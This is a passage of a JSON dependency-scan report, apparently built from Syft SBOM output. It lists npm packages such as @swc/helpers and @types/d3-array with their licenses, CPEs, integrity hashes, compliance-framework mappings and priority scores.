"sbom", "package" ], "raw": { "id": "32ce324a035d4e3a", "name": "@socket.io/component-emitter", "version": "3.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@socket.io\\/component-emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@socket.io\\/component_emitter:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component-emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@socket.io\\/component:\\@socket.io\\/component_emitter:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40socket.io/component-emitter@3.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz", "integrity": "sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "de2edab9a58d26f1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @swc/counter 0.1.3", "title": "@swc/counter 0.1.3", "description": "Package discovered: @swc/counter 0.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d1ab0047814562a3", "name": "@swc/counter", "version": "0.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@swc\\/counter:\\@swc\\/counter:0.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40swc/counter@0.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz", "integrity": "sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6291224f1bf77e3f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @swc/helpers 0.5.21", "title": "@swc/helpers 0.5.21", "description": "Package discovered: @swc/helpers 0.5.21", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f2d04f064acf1b61", "name": "@swc/helpers", "version": "0.5.21", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.21:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40swc/helpers@0.5.21", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz", "integrity": "sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg==", "dependencies": { "tslib": "^2.8.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ec0bf772439a91e3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @swc/helpers 0.5.5", "title": "@swc/helpers 0.5.5", "description": "Package discovered: @swc/helpers 0.5.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "72bc47189d44cca0", "name": "@swc/helpers", "version": "0.5.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@swc\\/helpers:\\@swc\\/helpers:0.5.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40swc/helpers@0.5.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz", "integrity": "sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A==", "dependencies": { "@swc/counter": "^0.1.3", "tslib": "^2.4.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "19698700a5d5ff08", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @tootallnate/once 2.0.0", "title": "@tootallnate/once 2.0.0", "description": "Package discovered: @tootallnate/once 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a7bdaefe075a54be", "name": "@tootallnate/once", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@tootallnate\\/once:\\@tootallnate\\/once:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40tootallnate/once@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", "integrity": "sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "80bf92167036230d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/caseless 0.12.5", "title": "@types/caseless 0.12.5", "description": "Package discovered: @types/caseless 0.12.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7578f19b88adc968", "name": "@types/caseless", "version": "0.12.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/caseless:\\@types\\/caseless:0.12.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/caseless@0.12.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a5c07d1028c25891", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/cors 2.8.19", "title": "@types/cors 2.8.19", "description": "Package discovered: @types/cors 2.8.19", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8b6775e086bda391", "name": "@types/cors", "version": "2.8.19", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/cors:\\@types\\/cors:2.8.19:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/cors@2.8.19", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz", "integrity": "sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg==", "dependencies": { "@types/node": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d3e89ddbd967f67d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-array 3.2.2", "title": "@types/d3-array 3.2.2", "description": "Package discovered: @types/d3-array 3.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "59c0361f7de521dd", "name": "@types/d3-array", "version": "3.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-array@3.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz", "integrity": "sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4a5d6407d36c3dfe", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-color 3.1.3", "title": "@types/d3-color 3.1.3", "description": "Package discovered: @types/d3-color 3.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ad88e8187765d8aa", "name": "@types/d3-color", "version": "3.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-color@3.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz", "integrity": "sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "075de1dd01220805", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-ease 3.0.2", "title": "@types/d3-ease 3.0.2", "description": "Package discovered: @types/d3-ease 3.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "df6234ea1d1790c8", "name": "@types/d3-ease", "version": "3.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-ease@3.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz", "integrity": 